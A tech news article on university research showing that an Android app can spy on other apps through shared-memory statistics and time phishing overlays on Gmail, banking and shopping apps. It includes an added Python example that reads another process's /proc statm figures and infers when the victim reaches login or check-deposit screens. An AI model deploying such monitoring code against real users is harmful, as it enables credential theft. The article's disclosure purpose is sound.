Same story, another day. No one should think anything is safe on the internet anymore. Researchers at the University of California, Riverside's Bourns College of Engineering and the University of Michigan have spotted a weakness they think exists across every major operating system, including iOS, Android and Windows.
This weakness could allow a malicious app to grab your personal information.
The researchers only tested the method on an Android phone, but believe it works on all three operating systems because they share a similar feature: any app can read another process's shared-memory usage statistics without needing any special permission.
“The assumption has always been that these apps can’t interfere with each other easily,” said Zhiyun Qian, an associate professor at UC Riverside, in a press statement. “We show that assumption is not correct and one app can in fact significantly impact another and result in harmful consequences for the user.”
So, how does the hack work? First, the user has to install a safe-looking app that is actually malicious. Think of those sketchy-looking wallpaper apps. Once the malicious app is installed, “the researchers are able to exploit a newly discovered public side channel — the shared memory statistics of a process, which can be accessed without any privileges,” according to the press release.
Here’s how the press release explains the attack: “The researchers monitor changes in shared memory and are able to correlate changes to what they call an ‘activity transition event,’ which includes such things as a user logging into Gmail or H&R Block or a user taking a picture of a check so it can be deposited online, without going to a physical CHASE Bank. Augmented with a few other side channels, the authors show that it is possible to fairly accurately track in real-time which activity a victim app is in.”
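To make the mechanism concrete, here is a small added example (not the researchers' code, and not from the press release) of what "monitoring shared memory and correlating changes to activity transitions" looks like in practice. It assumes that the statistic in question is the `shared` column of `/proc/<pid>/statm`, which on Linux (and on the Android builds of that era) any local process could read for any other process, and that a screen change in the victim app shows up as a short burst of jumps in that number as the new screen's window buffers are allocated. The sample readings and the transition "signatures" for `LoginActivity` and `CheckDepositActivity` are constructed for illustration, not measured values.

```python
"""Toy reconstruction of a shared-memory side channel (added example).

Assumptions (not from the article): the statistic is the `shared` field of
/proc/<pid>/statm, and an Activity transition produces a recognisable burst
of changes in it. Sample data and signatures below are constructed.
"""
import time
from typing import Dict, Iterable, List, Tuple

Sample = Tuple[float, int]   # (timestamp in seconds, shared pages)
Event = Tuple[float, int]    # (timestamp in seconds, delta in pages)


def read_shared_pages(pid: int) -> int:
    """Return the `shared` field (index 2) of /proc/<pid>/statm.

    No permission check is involved: any process may read another's statm.
    """
    with open(f"/proc/{pid}/statm") as f:
        return int(f.read().split()[2])


def poll(pid: int, seconds: float, interval: float = 0.005) -> List[Sample]:
    """Sample the victim's shared-page count at a fixed interval (live use only)."""
    out: List[Sample] = []
    end = time.monotonic() + seconds
    while time.monotonic() < end:
        out.append((time.monotonic(), read_shared_pages(pid)))
        time.sleep(interval)
    return out


def find_events(samples: Iterable[Sample], min_delta: int) -> List[Event]:
    """Reduce raw samples to change events, discarding jitter below min_delta."""
    events: List[Event] = []
    prev = None
    for t, pages in samples:
        if prev is not None and abs(pages - prev) >= min_delta:
            events.append((t, pages - prev))
        prev = pages
    return events


def infer_activities(events: List[Event], signatures: Dict[str, List[int]],
                     window: float = 0.5, tolerance: float = 0.2) -> List[Tuple[float, str]]:
    """Greedily match bursts of events against known transition signatures.

    A signature is the ordered list of page deltas a transition is expected to
    produce. A burst matches if every delta is within `tolerance` (relative)
    of the signature and the whole burst fits inside `window` seconds.
    Longer signatures are tried first so a short one cannot steal their prefix.
    """
    ordered = sorted(signatures.items(), key=lambda kv: -len(kv[1]))
    matches: List[Tuple[float, str]] = []
    i = 0
    while i < len(events):
        for name, sig in ordered:
            chunk = events[i:i + len(sig)]
            if len(chunk) < len(sig) or chunk[-1][0] - chunk[0][0] > window:
                continue
            if all(abs(d - s) <= tolerance * abs(s) for (_, d), s in zip(chunk, sig)):
                matches.append((chunk[0][0], name))
                i += len(sig)
                break
        else:
            i += 1
    return matches


# Constructed readings: baseline ~1200 pages with small jitter, a two-step
# jump at t=1.00 (login screen) and a single large jump at t=3.00 (camera).
SAMPLES: List[Sample] = [
    (0.00, 1200), (0.01, 1200), (0.02, 1203), (0.03, 1201),
    (1.00, 1681), (1.01, 1681), (1.05, 1921), (1.06, 1921),
    (2.00, 1919), (3.00, 2879), (3.01, 2879),
]

# Constructed signatures; a real attacker would learn these offline by
# driving the victim app through each screen and recording the deltas.
SIGNATURES: Dict[str, List[int]] = {
    "LoginActivity": [480, 240],
    "CheckDepositActivity": [960],
}

if __name__ == "__main__":
    for t, name in infer_activities(find_events(SAMPLES, min_delta=16), SIGNATURES):
        print(f"t={t:.2f}s  victim entered {name}")
```

The attacker-side detection is the cheap part; what made the research work was learning good signatures per app and per screen, and firing the overlay within the short window a transition leaves open. Note also that Android 7.0 later mounted `/proc` with `hidepid=2`, so other apps' `statm` files are no longer readable on current devices, which closes this particular channel even though the broader lesson about side channels still stands.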
Now, there are two things that need to happen for the attack to work. The attack has to take place at the exact moment the user is logging into the app or taking a picture. And it needs to be done without alerting the user.
“By design, Android allows apps to be preempted or hijacked,” Qian said. “But the thing is you have to do it at the right time so the user doesn’t notice. We do that and that’s what makes our attack unique.”
How did all the apps stack up? Gmail and H&R Block were the easiest to attack, with a 92% success rate. Newegg, WebMD, CHASE Bank and Hotels.com saw success rates over 80%. Amazon was tougher, at just 48%.
What made Amazon so hard? Users could transition to several different activities within the app, making it harder for the researchers to guess which screen was on the display.
What can you do to protect yourself? Qian says it best: “Don’t install untrusted apps.” Since the side channel needs no permissions, the permission list shown at install time will not warn you about an app that uses it.